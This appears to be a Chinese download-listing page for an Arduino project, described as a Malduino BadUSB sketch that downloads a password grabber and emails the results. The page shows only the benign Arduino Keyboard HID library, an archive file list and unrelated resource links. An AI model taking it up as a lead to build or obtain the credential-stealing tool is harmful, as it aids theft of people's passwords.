资源简介
Arduino-malduino-password-grabber.zip,Arduino Sketch为Malduino Bad USB(Lite)编程,下载密码抓取器并通过电子邮件发送结果Malduino Password Grabber,Arduino是一家开源软硬件公司和制造商社区。Arduino始于21世纪初,深受电子制造商的欢迎,Arduino通过开源系统提供了很多灵活性。

代码片段和文件信息
#define ADD_ALTGR
/*
Keyboard.cpp
Copyright (c) 2015 Arduino LLC
Original code (pre-library): Copyright (c) 2011 Peter Barrett
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License or (at your option) any later version.
This library is distributed in the hope that it will be useful
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not write to the Free Software
Foundation Inc. 51 Franklin St Fifth Floor Boston MA 02110-1301 USA
*/
#include “Keyboard.h“
#if defined(_USING_HID)
//================================================================================
//================================================================================
// Keyboard
static const uint8_t _hidReportDescriptor[] PROGMEM = {
// Keyboard
0x05 0x01 // USAGE_PAGE (Generic Desktop) // 47
0x09 0x06 // USAGE (Keyboard)
0xa1 0x01 // COLLECTION (Application)
0x85 0x02 // REPORT_ID (2)
0x05 0x07 // USAGE_PAGE (Keyboard)
0x19 0xe0 // USAGE_MINIMUM (Keyboard LeftControl)
0x29 0xe7 // USAGE_MAXIMUM (Keyboard Right GUI)
0x15 0x00 // LOGICAL_MINIMUM (0)
0x25 0x01 // LOGICAL_MAXIMUM (1)
0x75 0x01 // REPORT_SIZE (1)
0x95 0x08 // REPORT_COUNT (8)
0x81 0x02 // INPUT (DataVarAbs)
0x95 0x01 // REPORT_COUNT (1)
0x75 0x08 // REPORT_SIZE (8)
0x81 0x03 // INPUT (CnstVarAbs)
0x95 0x06 // REPORT_COUNT (6)
0x75 0x08 // REPORT_SIZE (8)
0x15 0x00 // LOGICAL_MINIMUM (0)
0x25 0x65 // LOGICAL_MAXIMUM (101)
0x05 0x07 // USAGE_PAGE (Keyboard)
0x19 0x00 // USAGE_MINIMUM (Reserved (no event indicated))
0x29 0x65 // USAGE_MAXIMUM (Keyboard Application)
0x81 0x00 // INPUT (DataAryAbs)
0xc0 // END_COLLECTION
};
Keyboard_::Keyboard_(void)
{
static HIDSubDescriptor node(_hidReportDescriptor sizeof(_hidReportDescriptor));
HID().AppendDescriptor(&node);
}
void Keyboard_::begin(void)
{
}
void Keyboard_::end(void)
{
}
void Keyboard_::sendReport(KeyReport* keys)
{
HID().SendReport(2keyssizeof(KeyReport));
}
extern
const u
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
目录 0 2017-07-14 01:24 malduino-password-grabber-master\
文件 430 2017-07-14 01:24 malduino-password-grabber-master\.gitignore
文件 11357 2017-07-14 01:24 malduino-password-grabber-master\LICENSE
文件 1882 2017-07-14 01:24 malduino-password-grabber-master\README.md
目录 0 2017-07-14 01:24 malduino-password-grabber-master\lite\
文件 9800 2017-07-14 01:24 malduino-password-grabber-master\lite\Keyboard.cpp
文件 2638 2017-07-14 01:24 malduino-password-grabber-master\lite\Keyboard.h
文件 2120 2017-07-14 01:24 malduino-password-grabber-master\lite\Params.h
文件 5422 2017-07-14 01:24 malduino-password-grabber-master\lite\lite.ino
文件 1795 2017-07-14 01:24 malduino-password-grabber-master\rubber_ducky_sc
相关资源
- ADNS-3080光流传感器测试程序Arduino
- EESkill NRF24L01 无线模块用户手册
- Arduino nano 工程文件
- Arduino教程 Lesson 之--自制风扇
- 基于Arduino的智能环境监控系统设计
- 基于Arduino和Machtalk的温棚环境监测系
- arduino pca9685多舵机同时控制案例
- arduino技术内幕
- Arduino电子设计实战指南.零基础篇_超
- 物联网智能家居平台DIY:ARDUINO 物联网
- 实验1.zip arduino跑马灯led灯实验,串口
- opencat所有资料.zip
- arduino主机,stm8从机。I2C测试 。每次
- DS18B20_Serial_println.ino
- ps2手柄arduino库文件
- 基于手机蓝牙的arduino遥控小车
- arduino中的can库函数
- 密码+指纹锁资料包.rar
- 贝壳物联arduino esp8266 demo版本
- HMC5883L罗盘指南针模块库文件及中英文
- arduino 小贱钟源码及教程
- Atom-TMC2208Pilot在Arduino上运行的应用程
- 写字机制作方案
- PID-增量式PID和位置式PID算法实现和
- Building Wireless Sensor Networks Using Arduin
- vc控制Arduino,实现串口通信
- Arduino入门经典
- Arduino所有库.zip
- 基于STM32和arduino的MPU9250九轴传感器代
- GY-9960模块Keil 和Arduino驱动程序
评论
共有 条评论